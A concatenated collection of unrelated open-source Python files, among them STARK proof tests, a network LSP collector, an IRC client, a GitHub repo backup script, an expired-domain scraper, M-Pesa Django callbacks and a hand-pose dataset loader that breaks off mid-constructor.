rhs = rhs + MPolynomial.constant(self.MDSinv[i][k]) * (next_state[k] - second_step_constants[k])
rhs = rhs^self.alpha
# equate left and right hand sides
air += [lhs-rhs]
return air
def randomizer_freedom( self, omicron, num_randomizers ):
domain = [omicron^i for i in range(self.N, self.N+num_randomizers)]
zerofier = Polynomial.zerofier_domain(domain)
multivariate_zerofier = MPolynomial.lift(zerofier, 0)
return multivariate_zerofier
```
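A brief sketch (an illustration, not in the original file) showing how `hash` and `trace` relate:
```python
rp = RescuePrime()
digest = rp.hash(FieldElement(1, rp.field))
trace = rp.trace(FieldElement(1, rp.field))
assert len(trace) == rp.N + 1                      # initial state plus one per round
assert trace[0] == [FieldElement(1, rp.field), rp.field.zero()]
assert trace[-1][0] == digest                      # rate part of the final state is the digest
```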
#### File: stark-anatomy/code/test_fri.py
```python
from algebra import *
from fri import *
def test_fri( ):
field = Field.main()
degree = 63
expansion_factor = 4
num_colinearity_tests = 17
initial_codeword_length = (degree + 1) * expansion_factor
log_codeword_length = 0
codeword_length = initial_codeword_length
while codeword_length > 1:
codeword_length //= 2
log_codeword_length += 1
assert(1 << log_codeword_length == initial_codeword_length), "log not computed correctly"
omega = field.primitive_nth_root(initial_codeword_length)
generator = field.generator()
assert(omega^(1 << log_codeword_length) == field.one()), "omega not nth root of unity"
assert(omega^(1 << (log_codeword_length-1)) != field.one()), "omega not primitive"
fri = Fri(generator, omega, initial_codeword_length, expansion_factor, num_colinearity_tests)
polynomial = Polynomial([FieldElement(i, field) for i in range(degree+1)])
domain = [omega^i for i in range(initial_codeword_length)]
codeword = polynomial.evaluate_domain(domain)
# test valid codeword
print("testing valid codeword ...")
proof_stream = ProofStream()
fri.prove(codeword, proof_stream)
print("")
points = []
verdict = fri.verify(proof_stream, points)
if verdict == False:
print("rejecting proof, but proof should be valid!")
return
for (x,y) in points:
if polynomial.evaluate(omega^x) != y:
print("polynomial evaluates to wrong value")
assert(False)
print("success! \\o/")
# disturb then test for failure
print("testing invalid codeword ...")
proof_stream = ProofStream()
for i in range(0, degree//3):
codeword[i] = field.zero()
fri.prove(codeword, proof_stream)
points = []
assert False == fri.verify(proof_stream, points), "proof should fail, but is accepted ..."
print("success! \\o/")
```
#### File: stark-anatomy/code/test_multivariate.py
```python
from multivariate import *
def test_evaluate( ):
field = Field.main()
variables = MPolynomial.variables(4, field)
zero = field.zero()
one = field.one()
two = FieldElement(2, field)
five = FieldElement(5, field)
mpoly1 = MPolynomial.constant(one) * variables[0] + MPolynomial.constant(two) * variables[1] + MPolynomial.constant(five) * (variables[2]^3)
mpoly2 = MPolynomial.constant(one) * variables[0] * variables[3] + MPolynomial.constant(five) * (variables[3]^3) + MPolynomial.constant(five)
mpoly3 = mpoly1 * mpoly2
point = [zero, five, five, two]
eval1 = mpoly1.evaluate(point)
eval2 = mpoly2.evaluate(point)
eval3 = mpoly3.evaluate(point)
assert(eval1 * eval2 == eval3), "multivariate polynomial multiplication does not commute with evaluation"
assert(eval1 + eval2 == (mpoly1 + mpoly2).evaluate(point)), "multivariate polynomial addition does not commute with evaluation"
print("eval3:", eval3.value)
print("multivariate evaluate test success \\o/")
def test_lift( ):
field = Field.main()
variables = MPolynomial.variables(4, field)
zero = field.zero()
one = field.one()
two = FieldElement(2, field)
five = FieldElement(5, field)
upoly = Polynomial.interpolate_domain([zero, one, two], [two, five, five])
mpoly = MPolynomial.lift(upoly, 3)
assert(upoly.evaluate(five) == mpoly.evaluate([zero, zero, zero, five])), "lifting univariate to multivariate failed"
print("lifting univariate to multivariate polynomial success \\o/")
``` |
{
"source": "3fr61n/netflow-correlator",
"score": 2
} |
#### File: network-rib/data/lsp-install-collector.py
```python
import warnings
with warnings.catch_warnings(record=True) as w:
import paramiko
import multiprocessing
from datetime import datetime
import re
import netmiko
from netmiko.ssh_exception import NetMikoTimeoutException, NetMikoAuthenticationException
import pytricia
import pprint
import os
import sys
import json
# DEVICE_CREDS contains the devices to connect to
from DEVICE_CREDS import all_devices
def worker_commands(a_device, mp_queue):
try:
a_device['port']
except KeyError:
a_device['port'] = 22
identifier = '{ip}'.format(**a_device)
return_data = {}
cmd = ''
command_jnpr = 'show configuration protocols mpls | display set'
command_csco = 'show running-config formal interface | i tunnel'
SSHClass = netmiko.ssh_dispatcher(a_device['device_type'])
try:
net_connect = SSHClass(**a_device)
if net_connect.device_type == 'juniper':
cmd = net_connect.send_command(command_jnpr)
elif net_connect.device_type == 'cisco_ios':
cmd = net_connect.send_command(command_csco)
except (NetMikoTimeoutException, NetMikoAuthenticationException) as e:
return_data[identifier] = False
# Add data to the queue (for parent process)
mp_queue.put(return_data)
return None
#print cmd
return_data[identifier] = pytricia.PyTricia()
return_data[identifier] = generate_json(cmd,identifier,net_connect.device_type)
mp_queue.put(return_data)
def generate_json(cmd,ip_host,device_type):
rib = {}
install = None
lsp_name = None
if device_type == 'juniper':
################### JNPR REGEX #############################
regex_install = "(?:install)(\s+\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{2})"
match_install = re.search(regex_install, cmd,re.MULTILINE)
if match_install:
install = match_install.group(1).strip().split('/')[0]
regex_endpoint = "(?:to)(\s+\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
match_endpoint = re.findall(regex_endpoint, cmd,re.MULTILINE)
regex_lsp_name = "(?:label-switched-path).(.*?\s+)"
match_lsp_name = re.search(regex_lsp_name, cmd,re.MULTILINE)
if match_lsp_name:
lsp_name = match_lsp_name.group(1).strip()
else:
################### CISCO REGEX #############################
cisco_lsp_name = "(?:signalled-name)(\s+.*)"
regex_cisco_lsp_name = re.search(cisco_lsp_name, cmd,re.MULTILINE)
if regex_cisco_lsp_name:
lsp_name = regex_cisco_lsp_name.group(1).strip()
cisco_install = "(?:autoroute)(?: destination)(.*)"
regex_cisco_install = re.search(cisco_install, cmd,re.MULTILINE)
if regex_cisco_install:
install = regex_cisco_install.group(1).strip()
cisco_endpoint = "(?:tunnel-te[0-9]+)(?: destination)(.*)"
match_endpoint = re.findall(cisco_endpoint, cmd,re.MULTILINE)
#match_endpoint = regex_cisco_endpoint.group(1).strip()
rib[install] = {'install':install,'endpoint':match_endpoint,'lsp_name':lsp_name}
return rib
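# Illustrative shape of the returned rib (addresses are made up):
# {'10.0.0.1': {'install': '10.0.0.1', 'endpoint': ['10.0.0.2'], 'lsp_name': 'LSP-A'}}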
def main():
if getattr(sys, 'frozen', False):
# frozen
BASE_DIR = os.path.dirname(sys.executable)
else:
# unfrozen
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
dirpath = BASE_DIR + '/lsp-install/'
filename = 'lsp_install.json'
# Create directory if does not exist
if not os.path.exists (dirpath):
os.makedirs (dirpath,mode=0777)
install = {}
path = os.path.join (dirpath,filename)
results = []
mp_queue = multiprocessing.Queue()
processes = []
for a_device in all_devices:
p = multiprocessing.Process(target=worker_commands, args=(a_device, mp_queue))
processes.append(p)
# start the work process
p.start()
# wait until the child processes have completed
for p in processes:
p.join()
# retrieve all the data from the queue
for p in processes:
results.append(mp_queue.get())
for i in results:
install.update(i)
with open (path,'w') as outfile:
json.dump(install,outfile)
if __name__ == '__main__':
main()
``` |
{
"source": "3ft9/twicli",
"score": 3
} |
#### File: twicli/src/irc.py
```python
import curses
import select
import socket
import sys
import textwrap
import time
import re
class CursesUI:
"""
May have a problem with inbound messages while typing - typing blocks the display of new data.
(the select.select() call triggers on the first keypress but blocks until newline. too lazy to write
an internal buffer to pick up on characters as they are typed. :> )
More to the point, the UI doesn't seem to be doing a 100% good job of splitting up the input. Occasionally
inbound messages will not get parsed - this seems to happen when multiple items arrive at once.
Also, server messages (large and all-at-once) are not parsing properly.
Parts are inspired from http://twistedmatrix.com/documents/current/examples/cursesclient.py
"""
def __init__(self, irceng):
"""
Input param:
socket - open socket to IRC server
irceng - IRC engine object
"""
self.lines = []
self.engine = irceng
self.sock = self.engine.connect()
self.linewrap = textwrap.TextWrapper()
self.stdscr = curses.wrapper(self.evtloop)
def addline(self, line, screen):
# First part sanitizes input for the screen - break input buffer into lines (\n), then into
# screen lines based on width
line = line.rstrip()
actuallines = line.split("\n")
for entry in actuallines:
try:
entry = self.engine.parseinput(entry)
except PingInputError, err:
self.sock.sendall("PONG :" + err.value + "\n")
entry = "PING/PONG to " + err.value
screenlines = self.linewrap.wrap(entry)
for item in screenlines:
self.lines.append(item)
# Now we clear the screen and loop over the formatted lines to display them.
screen.clear()
i = 0
index = len(self.lines) - 1
while i < self.nrows - 2 and index >= 0:
screen.addstr(self.nrows-2-i, 0, self.lines[index])
i = i + 1
index = index - 1
screen.move(self.nrows-1, 0)
screen.refresh()
def evtloop(self, screen):
curses.echo()
self.nrows, self.ncols = screen.getmaxyx()
self.linewrap.width = self.ncols
while True:
(inlst, outlst, errlst) = select.select([self.sock, sys.stdin], [], [])
if self.sock in inlst :
# data coming in
data = self.sock.recv(8192)
if len(data) > 0:
# self.addline(self.engine.parseinput(data), screen)
# Moving the parseinput() call to addline()
self.addline(data, screen)
else :
# No data from socket - socket may be closed
# Test this and exit gracefully if needed
try :
self.sock.sendall("PING\n")
except socket.error :
print "Socket closed by host."
break
elif sys.stdin in inlst :
# keyboard data to be sent
data = self.engine.parsecmd(screen.getstr())
self.sock.sendall(data + "\n")
self.addline(data, screen)
def close(self):
self.engine.shutdown()
class PythonIRC:
def __init__(self, svr="irc.freenode.net", prt=6667, nck="PythIRC", rname="Python-IRC User"):
self.server = svr
self.port = prt
self.nick = nck
self.realname = rname
self.channel = ""
self.usercmd = re.compile('^/(\w+)( (.*))?$')
self.usermsg = re.compile('^(#?\w+)( (.*))?$')
self.svrmsg = re.compile('^:([a-zA-Z0-9\.]+) [0-9]+ ' + self.nick + '(.*)')
self.chanmsg = re.compile('^:(.+)![~]?(.+)@(.+) (\w+) #?(\w+) :(.*)$')
self.genmsg = re.compile('^:(.+)!~?(.+)@([a-zA-Z0-9\-\.]+) (\w+) :?(.*)$')
self.pingmsg = re.compile('^PING :(.*)$', re.IGNORECASE)
def connect(self):
# Connect to the IRC server.
# ... insert socket code here ...
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.server, self.port))
# ... add error handling for the commands?
nickcmd = "NICK " + self.nick + "\n"
usercmd = "USER Python-IRC host server :" + self.realname + "\n" # Might want to not hardcode those
self.sock.sendall(nickcmd) # Need to check for collision here
self.sock.sendall(usercmd) # Watch for errors here
return self.sock # The established connection
def parseinput(self, input):
if self.svrmsg.match(input) is not None:
# Server message
parse = self.svrmsg.match(input)
result = parse.group(1) + ": " + parse.group(2)
elif self.chanmsg.match(input) is not None:
# Channel msg
parse = self.chanmsg.match(input)
if parse.group(4).upper() == "PRIVMSG":
result = "[#" + parse.group(5) + " || " + parse.group(1) + "]: " + parse.group(6)
else:
# Unhandled
result = input.rstrip()
elif self.genmsg.match(input) is not None:
# General messages
parse = self.genmsg.match(input)
if parse.group(4).upper() == "QUIT":
result = "-- " + parse.group(1) + " has quit: " + parse.group(5)
elif parse.group(4).upper() == "JOIN":
result = "++ " + parse.group(1) + " has joined " + parse.group(5)
elif parse.group(4).upper() == "NICK":
result = "-+ " + parse.group(1) + " has morphed into " + parse.group(5)
else:
# Unhandled input
result = input.rstrip()
elif self.pingmsg.match(input):
parse = self.pingmsg.match(input)
raise PingInputError, parse.group(1)
else:
# Unhandled input
result = input.rstrip()
return result
def parsecmd(self, input):
"""
This function parses user supplied input and reformats into IRC commands
"""
# If first char is a /, then this is a command.
output = input
if input[0] == "/" :
parsedcmd = self.usercmd.match(input)
output = parsedcmd.group(1).upper() # group(0) is the raw match, not the group
# Insert a bunch of if..elif..else statements
if (output == "MSG") :
# private message to a user. format: /msg user text
# break off the first word of group(3) to get userid
splitcmd = self.usermsg.match(parsedcmd.group(3))
output = "PRIVMSG " + splitcmd.group(1) + " :" + splitcmd.group(3) # Note - no error checking for existence of groups
elif (output == "JOIN") :
# Only supports one channel, no keys, at this time
if parsedcmd.group(3) is not None:
output = output + " " + parsedcmd.group(3) # Note - group(2) contains that space
# Store channel for later use
self.channel = parsedcmd.group(3)
else :
# Raise a USER=ID10T error
pass
elif (output == "QUIT") :
# map add'l params i.e. reason for quitting
if parsedcmd.group(3) is not None:
output = output + " :" + parsedcmd.group(3)
elif (output == "PART") :
# add'l param = channel to leave
if parsedcmd.group(3) is not None:
output = output + " " + parsedcmd.group(3)
elif (output == "NICK") :
output = "NICK " + parsedcmd.group(3)
elif input[0] == "#" :
splitcmd = self.usermsg.match(input)
output = "PRIVMSG " + splitcmd.group(1) + " :" + splitcmd.group(3)
self.channel = splitcmd.group(1) # Update the CHANNEL variable - allows for easier multiple messages
else :
# This is a msg for a channel.
# look for null input!
output = "PRIVMSG " + self.channel + " :" + output # Retrieves channel from above
return output.rstrip()
def shutdown(self):
self.sock.close()
class PingInputError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def usage():
print("Python-IRC (c) 2004 <NAME>. Some rights reserved (http://creativecommons.org)")
print("USAGE: " + sys.argv[0] + " server port nick realname")
if (__name__ == "__main__"):
# Expect server port nick realname
if len(sys.argv) != 5:
usage()
else:
client = PythonIRC(svr=sys.argv[1], prt=int(sys.argv[2]), nck=sys.argv[3], rname=sys.argv[4])
cursesui = CursesUI(client)
# Event loop happens ... need more graceful way
cursesui.close()
```
#### File: twicli/src/streamcatcher.py
```python
from twython import TwythonStreamer
import curses
import textwrap
import HTMLParser
class StreamCatcher(TwythonStreamer):
def start(self):
self.htmlparser = HTMLParser.HTMLParser()
self.lines = []
self.linewrap = textwrap.TextWrapper()
try:
self.stdscr = curses.wrapper(self._run)
except KeyboardInterrupt:
self.disconnect()
def _run(self, screen):
curses.start_color()
curses.use_default_colors()
curses.echo()
self.nrows, self.ncols = screen.getmaxyx()
self.linewrap.width = self.ncols
self._screen = screen
self._addline('=> Connected!')
self.user(replies='all')
def _addline(self, line):
# First part sanitizes input for the screen - break input buffer into lines
# (\n), then into screen lines based on width
line = line.rstrip()
actuallines = line.split("\n")
for entry in actuallines:
screenlines = self.linewrap.wrap(entry)
for item in screenlines:
self.lines.append(item)
# Now we clear the screen and loop over the formatted lines to display them.
self._screen.clear()
i = 0
index = len(self.lines) - 1
while i < self.nrows - 2 and index >= 0:
self._screen.addstr(self.nrows-2-i, 0, self.lines[index])
i = i + 1
index = index - 1
self._screen.move(self.nrows-1, 0)
self._screen.refresh()
def on_success(self, data):
if 'text' in data:
self._addline(data['user']['name'].encode('utf-8') + ' [' + data['user']['screen_name'].encode('utf-8') + ']: ' + self.htmlparser.unescape(data['text']).encode('utf-8'))
elif 'friends' in data:
num = len(data['friends'])
self._addline('=> You are following ' + str(num) + ' user' + ('' if num == 1 else 's'))
else:
self._addline('Received: ' + str(data))
def on_error(self, status_code, data):
self._addline('ERR: [' + str(status_code) + '] ' + data)
``` |
{
"source": "3gbywork/BackupRepos",
"score": 3
} |
#### File: 3gbywork/BackupRepos/backupRepos.py
```python
import urllib.request
import base64
import json
import io
import os
import sys
# personal public access token
USER=''
TOKEN=''
GIT_API_URL='https://api.github.com'
def main(argv):
if len(argv) > 1:
user=argv[1]
else:
user=input("enter username: ").strip()
if not user:
print("username can't be null")
sys.exit(1)
print("\n================================")
print("list public repos for the user: %s" % user)
repos=getRepos(user)
for name,url in repos:
print("name: %-30s url: %s" % (name,url))
print("================================\n")
input("press enter to clone or update all repos...")
cloneOrUpdateRepos(repos)
def cloneOrUpdateRepos(repos):
for name,url in repos:
print("\n================================")
if os.path.exists(name):
print("repo: %s has exists, will update" % name)
os.system("cd %s & git pull" % name)
else:
print("repo: %s not exists, will clone" % name)
os.system("git clone %s" % url)
print("================================\n")
def getRepos(user):
resp = getApi('/users/%s/repos' % user)
return [(x["name"],x["clone_url"]) for x in json.load(io.StringIO(resp))]
def getApi(url):
try:
req=urllib.request.Request(GIT_API_URL+url)
if USER and TOKEN:
print("authorization with %s-%s" % (USER, TOKEN))
b64str=base64.b64encode(bytes('%s/token:%s' % (USER, TOKEN), 'utf-8')).decode('utf-8')
req.add_header("Authorization", "Basic %s" % b64str)
resp=urllib.request.urlopen(req)
cnt=resp.read().decode('utf-8')
resp.close()
return cnt
except Exception:
print('failed to get api request from %s' % url)
if __name__ == "__main__":
try:
main(sys.argv)
except KeyboardInterrupt:
sys.exit(2)
``` |
{
"source": "3gbywork/PythonChallengeStrategy",
"score": 3
} |
#### File: Code/Python/Challenge008.py
```python
def makeBz2(filename, data):
fp=open(filename, 'wb')
fp.write(data)
fp.close()
import helper
dir=".\\Data\\008"
helper.ensureDir(dir)
un=b'BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x02\xc0\x02\x00 \x00!\x9ah3M\x07<]\xc9\x14\xe1BA\x06\xbe\x084'
pw=b'<PASSWORD>&<PASSWORD>$|\x0e\x00\x00\x00\x81\x00\x03$ \x00!\x9ah3M\x13<]\xc9\x14\xe1BBP\x91\xf08'
makeBz2(dir+'\\user.bz2', un)
makeBz2(dir+'\\pwd.bz2', pw)
# ================================
import codecs
username=codecs.decode(un, 'bz2').decode('utf-8')
password=codecs.decode(pw, 'bz2').decode('utf-8')
# or
# username=codecs.decode(open(dir+'\\user.bz2','rb').read(), 'bz2').decode('utf-8')
# password=codecs.decode(open(dir+'\\pwd.bz2','rb').read(), 'bz2').decode('utf-8')
print('username: %s\npassword: %s' % (username, password))
```
#### File: Code/Python/helper.py
```python
def readFile(filename):
fp=open(filename)
content=fp.read()
fp.close()
return content
def ensureDir(dir):
import os
if not os.path.exists(dir):
os.mkdir(dir)
def installHTTPBasicAuthOpener(user, passwd):
import urllib.request
auth_handler=urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password("inflate", "http://www.pythonchallenge.com", user, passwd)
opener=urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
``` |
{
"source": "3gstudent/GetExpiredDomains",
"score": 3
} |
#### File: 3gstudent/GetExpiredDomains/GetExpiredDomains.py
```python
import urllib
import urllib2
import sys
from bs4 import BeautifulSoup
def GetResults(loop,key):
for i in range(1,loop):
print "[+]Page %d" %(i+1)
url = "https://www.expireddomains.net/domain-name-search/?start=" + str(25*i) + "&q="+ key
#print url
req = urllib2.Request(url)
#req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36")
res_data = urllib2.urlopen(req)
html = BeautifulSoup(res_data.read(), "html.parser")
tds = html.findAll("td", {"class": "field_domain"})
for td in tds:
print td.findAll("a")[0]["title"]
def SearchExpireddomains(key):
url = "https://www.expireddomains.net/domain-name-search/?q=" + key
req = urllib2.Request(url)
#req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36")
res_data = urllib2.urlopen(req)
html = BeautifulSoup(res_data.read(), "html.parser")
Result = html.select('strong')[0].text.replace(',', '')
print "[*]Total results: %s" % Result
if int(Result) <25:
return
elif int(Result) > 550:
print "[!]Too many results,only get 550 result."
print "[*]21 requests will be sent."
print "[+]Page 1"
tds = html.findAll("td", {"class": "field_domain"})
for td in tds:
print td.findAll("a")[0]["title"]
GetResults(21,key)
else:
print "[*]%d requests will be sent." % (int(Result)/25+1)
print "[+]Page 1"
tds = html.findAll("td", {"class": "field_domain"})
for td in tds:
print td.findAll("a")[0]["title"]
GetResults(int(Result)/25+1,key)
if __name__ == "__main__":
print "GetExpiredDomains - Search for available domain from expireddomains.net"
print "Author: 3gstudent\n"
if len(sys.argv)!=2:
print ('Usage:')
print (' GetExpiredDomains.py <Search String>')
sys.exit(0)
SearchExpireddomains(sys.argv[1])
print "[*]All Done"
``` |
{
"source": "3h4x/cb-event-forwarder",
"score": 2
} |
#### File: test/scripts/export_raw_events.py
```python
import collections
import os
import re
import sys
import optparse
import pika
sensorid_to_details_map = {}
cbapi = {}
g_output = None
g_config = {}
class EventOutput(object):
DESTINATIONS = ['udp', 'tcp', 'file', 'stdout', 's3']
def __init__(self, out_dest):
if out_dest not in EventOutput.DESTINATIONS:
raise ValueError("output destination (%s) not a valid destination value" % out_dest)
self.dest = out_dest
def output(self, mime_type, routing_key, eventdata, header_frame):
raise Exception("Not Implemented")
class RawEventOutput(EventOutput):
def __init__(self, outdir):
super(RawEventOutput, self).__init__('file')
self.destdir = outdir
self.types = []
os.makedirs(outdir, 0700)
self.count = 0
def output(self, mime_type, routing_key, eventdata, header_frame):
if mime_type not in self.types:
os.mkdir(os.path.join(self.destdir, mime_type), 0700)
self.types.append(mime_type)
open(os.path.join(self.destdir, mime_type,
"%d.%s" % (self.count, mime_type)),
'wb').write(eventdata)
open(os.path.join(self.destdir, mime_type, "%d.txt" % self.count), 'wb').write(str(header_frame))
self.count += 1
def get_stats(self):
return self.count
def get_mq_user_from_cbconf():
for line in open('/etc/cb/cb.conf').readlines():
if line.strip().startswith('RabbitMQUser'):
return line.split('=')[1].strip()
def get_mq_pass_from_cbconf():
for line in open('/etc/cb/cb.conf').readlines():
if line.strip().startswith('RabbitMQPassword'):
return line.split('=')[1].strip()
def on_bus_msg(channel, method_frame, header_frame, body):
"""callback that gets called for any event on the CB pub/sub event bus"""
try:
if not header_frame.content_type.startswith("application/"):
sys.stderr.write("-> Unexpected data type %s\n" % header_frame.content_type)
sys.stderr.flush()
else:
g_output.output(header_frame.content_type.replace("application/", ""), method_frame.routing_key, body, header_frame)
except Exception, e:
sys.stderr.write("-> Exception processing bus msg: %s\n" % e)
def bus_event_loop(cb_hostname, rabbit_mq_user, rabbit_mq_pass):
credentials = pika.PlainCredentials(rabbit_mq_user, rabbit_mq_pass)
parameters = pika.ConnectionParameters(cb_hostname,
5004,
'/',
credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
queue_name = 'raw_event_exporter_pid_%d' % os.getpid()
# make sure you use auto_delete so the queue isn't left filling
# with events when this program exits.
channel.queue_declare(queue=queue_name, auto_delete=True)
channel.exchange_declare(type='fanout', exchange='api.rawsensordata', durable=True, auto_delete=False,
passive=False)
channel.queue_bind(exchange='api.rawsensordata', queue=queue_name)
channel.basic_consume(on_bus_msg, queue=queue_name, no_ack=True)
sys.stderr.write("-> Subscribed to Pub/Sub bus (press Ctl-C to quit)\n")
sys.stderr.flush()
try:
channel.start_consuming()
except KeyboardInterrupt:
channel.stop_consuming()
connection.close()
def build_cli_parser():
parser = optparse.OptionParser(usage="%prog [options]", description="Process Cb Response Sensor Event Logs")
#
# CB server info (needed for host information lookups)
#
group = optparse.OptionGroup(parser, "CB server options")
group.add_option("-c", "--cburl", action="store", default=None, dest="url",
help="CB server's URL. e.g., http://127.0.0.1; only useful when -A is specified")
group.add_option("-a", "--apitoken", action="store", default=None, dest="token",
help="API Token for Cb Response server; only useful when -A and -c are specified")
group.add_option("-n", "--no-ssl-verify", action="store_false", default=True, dest="ssl_verify",
help="Do not verify server SSL certificate; only useful when -c is specified.")
parser.add_option_group(group)
#
# Bus options
#
group = optparse.OptionGroup(parser, "CB Bus connection options")
group.add_option("-u", "--user", action="store", default=None, dest="user",
help="The username for the rabbitMQ pub/sub event bus (default is to pull it from config)")
group.add_option("-p", "--pass", action="store", default=None, dest="pwd",
help="The password for the rabbitMQ pub/sub event bus (default is to pull it from config)")
parser.add_option_group(group)
#
# Output options (ie - where do we put the formatted events and how are they formatted)
#
group = optparse.OptionGroup(parser, "Output options",
"Output options for events that control both the formatting and destination")
group.add_option("-d", "--directory", action="store", default=None, dest="outdir",
help="Write the raw events to a directory")
parser.add_option_group(group)
return parser
if __name__ == '__main__':
parser = build_cli_parser()
opts, args = parser.parse_args(sys.argv)
cbhost = None
if opts.url:
cbapi['url'] = opts.url
hostmatch = re.compile('https?://([^/]+)/?').match(opts.url)
if hostmatch:
cbhost = hostmatch.group(1)
if not opts.outdir:
parser.error("Output directory is required")
# output processing
g_output = RawEventOutput(opts.outdir)
user = opts.user
    pwd = opts.pwd
if not user:
user = get_mq_user_from_cbconf()
if not pwd:
pwd = get_mq_pass_from_cbconf()
if not cbhost:
cbhost = 'localhost'
bus_event_loop(cbhost, user, pwd)
``` |
{
"source": "3HeadedSnake/darajaapp",
"score": 2
} |
#### File: mpesa/api/views.py
```python
from datetime import datetime
import pytz
from rest_framework.generics import CreateAPIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from mpesa.api.serializers import LNMOnlineSerializer, C2BPaymentSerializer
from mpesa.models import LNMOnline, C2BPayments
class LNMCallbackUrlAPIView(CreateAPIView):
queryset = LNMOnline.objects.all()
serializer_class = LNMOnlineSerializer
permission_classes = [AllowAny]
def create(self, request):
print (request.data,"This is request.data")
merchant_request_id = request.data["Body"]["stkCallback"]["MerchantRequestID"]
checkout_request_id = request.data["Body"]["stkCallback"]["CheckoutRequestID"]
result_code = request.data["Body"]["stkCallback"]["ResultCode"]
result_description = request.data["Body"]["stkCallback"]["ResultDesc"]
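        # Hedged note on the assumed payload shape: this follows the Daraja
        # STK-push callback layout, where CallbackMetadata.Item is a list of
        # {"Name": ..., "Value": ...} pairs ordered Amount, MpesaReceiptNumber,
        # Balance, TransactionDate, PhoneNumber. Balance is often omitted by
        # the API, which is why it is hard-coded to "" below and index 2 is skipped.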
amount = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][0]['Value']
mpesa_receipt_number = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][1]['Value']
balance = ""
transaction_date = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][3]['Value']
phone_number = request.data["Body"]["stkCallback"]["CallbackMetadata"]['Item'][4]['Value']
        str_transaction_date = str(transaction_date)
        transaction_datetime = datetime.strptime(str_transaction_date, "%Y%m%d%H%M%S")
        my_transaction_datetime = pytz.utc.localize(transaction_datetime)
our_model = LNMOnline.objects.create(
CheckoutRequestID = checkout_request_id,
MerchantRequestID = merchant_request_id,
Amount = amount,
ResultCode = result_code,
ResultDesc = result_description,
MpesaReceiptNumber = mpesa_receipt_number,
Balance = balance,
TransactionDate = my_transaction_datetime,
PhoneNumber = phone_number,
)
our_model.save()
return Response ({"OurResultDesc":"SUCCESSFUL"})
class C2BValidationAPIView(CreateAPIView):
queryset = C2BPayments.objects.all()
serializer_class = C2BPaymentSerializer
permission_classes = [AllowAny]
def create(self, request):
my_headers = self.get_success_headers(request.data)
return Response({"ResultCode":0})
class C2BConfirmationAPIView(CreateAPIView):
queryset = C2BPayments.objects.all()
serializer_class = C2BPaymentSerializer
permission_classes = [AllowAny]
def create(self, request):
return Response({"ResultDesc": 0})
``` |
{
"source": "3HeadedSnake/django_analytics",
"score": 2
} |
#### File: django_analytics/dashboard/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
from dashboard.models import Order
from django.core import serializers
# Directs user to the dashboard/templates
def dashboard_with_pivot(request):
return render(request, 'dashboard_with_pivot.html', {})
# Sends response to the pivot table
def pivot_data(request):
dataset = Order.objects.all()
data = serializers.serialize('json', dataset)
return JsonResponse(data, safe=False)
``` |
{
"source": "3huo/Hand-Pointnet",
"score": 2
} |
#### File: Hand-Pointnet/train_eval/dataset.py
```python
import torch.utils.data as data
import os
import os.path
import torch
import numpy as np
import scipy.io as sio
import pdb
SAMPLE_NUM = 1024
JOINT_NUM = 21
subject_names = ["P0", "P1", "P2", "P3", "P4", "P5", "P6", "P7", "P8"]
gesture_names = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "I", "IP", "L", "MP", "RP", "T", "TIP", "Y"]
class HandPointDataset(data.Dataset):
def __init__(self, root_path, opt, train=True):
self.root_path = root_path
self.train = train
self.size = opt.size
self.test_index = opt.test_index
self.PCA_SZ = opt.PCA_SZ
self.SAMPLE_NUM = opt.SAMPLE_NUM
self.INPUT_FEATURE_NUM = opt.INPUT_FEATURE_NUM
self.JOINT_NUM = opt.JOINT_NUM
if self.size == 'full':
self.SUBJECT_NUM = 9
self.GESTURE_NUM = 17
elif self.size == 'small':
self.SUBJECT_NUM = 3
self.GESTURE_NUM = 2
        self.total_frame_num = self.__total_frame_num()
self.point_clouds = np.empty(shape=[self.total_frame_num, self.SAMPLE_NUM, self.INPUT_FEATURE_NUM],
dtype=np.float32)
self.volume_length = np.empty(shape=[self.total_frame_num, 1], dtype=np.float32)
self.gt_xyz = np.empty(shape=[self.total_frame_num, self.JOINT_NUM, 3], dtype=np.float32)
self.valid = np.empty(shape=[self.total_frame_num, 1], dtype=np.float32)
self.start_index = 0
self.end_index = 0
if self.train: # train
for i_subject in range(self.SUBJECT_NUM):
if i_subject != self.test_index:
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[i_subject], gesture_names[i_gesture])
print("Training: " + cur_data_dir)
self.__loaddata(cur_data_dir)
else: # test
for i_gesture in range(self.GESTURE_NUM):
cur_data_dir = os.path.join(self.root_path, subject_names[self.test_index], gesture_names[i_gesture])
print("Testing: " + cur_data_dir)
self.__loaddata(cur_data_dir)
self.point_clouds = torch.from_numpy(self.point_clouds)
self.volume_length = torch.from_numpy(self.volume_length)
self.gt_xyz = torch.from_numpy(self.gt_xyz)
self.valid = torch.from_numpy(self.valid)
self.gt_xyz = self.gt_xyz.view(self.total_frame_num, -1)
valid_ind = torch.nonzero(self.valid)
valid_ind = valid_ind.select(1, 0)
self.point_clouds = self.point_clouds.index_select(0, valid_ind.long())
self.volume_length = self.volume_length.index_select(0, valid_ind.long())
self.gt_xyz = self.gt_xyz.index_select(0, valid_ind.long())
self.total_frame_num = self.point_clouds.size(0)
# load PCA coeff
PCA_data_path = os.path.join(self.root_path, subject_names[self.test_index])
print("PCA_data_path: " + PCA_data_path)
